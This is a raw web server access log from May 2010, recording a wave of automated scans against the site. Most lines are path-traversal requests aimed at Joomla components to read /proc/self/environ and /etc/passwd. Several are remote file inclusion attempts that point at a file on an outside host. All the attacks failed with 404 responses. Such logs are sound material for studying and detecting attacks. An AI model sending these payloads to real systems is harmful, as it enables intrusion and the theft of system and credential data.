125.165.52.96 - - [23/May/2010:05:57:53 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://www.google.co.id/imglanding?q=banner%20koi&imgurl=http://www.mysticwatergardens.com/images/banner_koi_pnd.jpg&imgrefurl=http://www.mysticwatergardens.com/koi-fish-pond.htm&usg=__QBchPiVQsel-_lkVPv7-uhiBfIA=&h=311&w=750&sz=49&hl=id&um=1&itbs=1&tbnid=eTjO26F2-Q3umM:&tbnh=58&tbnw=141&prev=/images%3Fq%3Dbanner%2Bkoi%26um%3D1%26hl%3Did%26client%3Dfirefox-a%26sa%3DN%26rls%3Dorg.mozilla:en-US:official%26tbs%3Disch:1&um=1&client=firefox-a&sa=N&rls=org.mozilla:en-US:official&tbs=isch:1&start=0""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
72.5.54.51 - - [23/May/2010:05:57:56 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [23/May/2010:05:57:56 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [23/May/2010:05:57:56 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.45.185.178 - - [23/May/2010:05:57:57 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
207.45.185.178 - - [23/May/2010:05:57:57 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.45.185.178 - - [23/May/2010:05:57:58 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
99.198.118.114 - - [23/May/2010:05:58:03 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
99.198.118.114 - - [23/May/2010:05:58:03 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
99.198.118.114 - - [23/May/2010:05:58:03 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
173.236.37.218 - - [23/May/2010:05:58:16 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
173.236.37.218 - - [23/May/2010:05:58:16 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
173.236.37.218 - - [23/May/2010:05:58:16 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.5.54.51 - - [23/May/2010:05:58:16 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
64.22.87.208 - - [23/May/2010:05:58:17 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
64.22.87.208 - - [23/May/2010:05:58:18 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
64.22.87.208 - - [23/May/2010:05:58:18 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.59.218 - - [23/May/2010:05:58:28 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.121.59.218 - - [23/May/2010:05:58:28 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.121.59.218 - - [23/May/2010:05:58:28 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
72.55.146.140 - - [23/May/2010:05:59:27 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
65.89.55.2 - - [23/May/2010:05:59:38 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
65.89.55.2 - - [23/May/2010:05:59:38 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
65.89.55.2 - - [23/May/2010:05:59:39 -0500] "GET /logs/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.250.255.243 - - [23/May/2010:06:01:24 -0500] "GET /logs/access_log.1254355200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
99.198.118.114 - - [23/May/2010:06:01:37 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
173.236.37.218 - - [23/May/2010:06:01:37 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
88.191.94.188 - - [23/May/2010:06:01:37 -0500] "GET //components/com_flyspray/startdown.php?file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:06:01:37 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:06:01:37 -0500] "GET /logs/access_log.1263772800//components/com_flyspray/startdown.php?file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:06:01:37 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:06:01:37 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:06:01:37 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
88.191.94.188 - - [23/May/2010:06:01:49 -0500] "GET //components/com_flyspray/startdown.php?file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:06:01:49 -0500] "GET /logs/access_log.1263772800//components/com_flyspray/startdown.php?file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:06:01:49 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
97.74.75.246 - - [23/May/2010:06:01:51 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:06:01:56 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:06:01:56 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:06:01:56 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:06:01:56 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
88.191.94.188 - - [23/May/2010:06:02:00 -0500] "GET /logs/access_log.1265155200//components/com_flyspray/startdown.php?file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
97.74.75.246 - - [23/May/2010:06:02:01 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
88.191.94.188 - - [23/May/2010:06:02:14 -0500] "GET /logs/access_log.1265155200//components/com_flyspray/startdown.php?file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
72.5.54.51 - - [23/May/2010:06:02:16 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
72.5.54.51 - - [23/May/2010:06:02:16 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
72.5.54.51 - - [23/May/2010:06:02:16 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
72.5.54.51 - - [23/May/2010:06:02:49 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
124.217.229.185 - - [23/May/2010:06:02:51 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
202.6.141.218 - - [23/May/2010:06:02:52 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
202.6.141.218 - - [23/May/2010:06:02:52 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
124.217.229.185 - - [23/May/2010:06:02:52 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:06:02:57 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:06:02:57 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:06:02:59 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:06:03:00 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.16.194.154 - - [23/May/2010:06:03:03 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
69.16.194.154 - - [23/May/2010:06:03:03 -0500] "GET /logs/access_log.1273622400%20/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""-"
69.16.194.154 - - [23/May/2010:06:03:03 -0500] "GET /logs/access_log.1273622400%20/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 322 "-""-"
69.16.194.154 - - [23/May/2010:06:03:03 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
65.89.55.2 - - [23/May/2010:06:03:04 -0500] "GET /logs/access_log.1273622400/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.45.185.178 - - [23/May/2010:06:03:12 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
207.45.185.178 - - [23/May/2010:06:03:12 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.45.185.178 - - [23/May/2010:06:03:12 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
69.16.194.154 - - [23/May/2010:06:03:12 -0500] "GET /logs/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
69.16.194.154 - - [23/May/2010:06:03:13 -0500] "GET /logs/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
207.45.185.178 - - [23/May/2010:06:03:20 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.59.218 - - [23/May/2010:06:03:32 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.121.59.218 - - [23/May/2010:06:03:32 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.121.59.218 - - [23/May/2010:06:03:32 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.22.87.208 - - [23/May/2010:06:03:57 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.59.218 - - [23/May/2010:06:03:58 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
72.55.146.140 - - [23/May/2010:06:04:20 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [23/May/2010:06:04:20 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.5.54.51 - - [23/May/2010:06:05:11 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [23/May/2010:06:05:11 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.236.37.218 - - [23/May/2010:06:05:37 -0500] "GET /logs/index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
173.236.37.218 - - [23/May/2010:06:05:37 -0500] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.45.185.154 - - [23/May/2010:06:06:37 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:06:06:38 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:06:06:38 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
207.45.185.178 - - [23/May/2010:06:06:47 -0500] "GET /logs/index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.45.185.178 - - [23/May/2010:06:06:47 -0500] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
99.198.118.114 - - [23/May/2010:06:06:59 -0500] "GET /logs/index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
99.198.118.114 - - [23/May/2010:06:06:59 -0500] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.121.59.218 - - [23/May/2010:06:07:01 -0500] "GET /logs/index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.121.59.218 - - [23/May/2010:06:07:01 -0500] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
64.22.87.208 - - [23/May/2010:06:07:03 -0500] "GET /logs/index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
64.22.87.208 - - [23/May/2010:06:07:03 -0500] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
65.89.55.2 - - [23/May/2010:06:07:28 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
65.89.55.2 - - [23/May/2010:06:07:28 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
65.89.55.2 - - [23/May/2010:06:07:28 -0500] "GET /logs/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
77.92.74.100 - - [23/May/2010:06:07:29 -0500] "GET /logs/index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
77.92.74.100 - - [23/May/2010:06:07:29 -0500] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
207.46.199.193 - - [23/May/2010:06:07:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.20.123 - - [23/May/2010:06:07:56 -0500] "GET /logs/index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:06:07:57 -0500] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
72.5.54.51 - - [23/May/2010:06:08:05 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
210.219.173.32 - - [23/May/2010:06:08:15 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
210.219.173.32 - - [23/May/2010:06:08:15 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
210.219.173.32 - - [23/May/2010:06:08:16 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
212.241.251.224 - - [23/May/2010:06:09:25 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
212.241.251.224 - - [23/May/2010:06:09:26 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
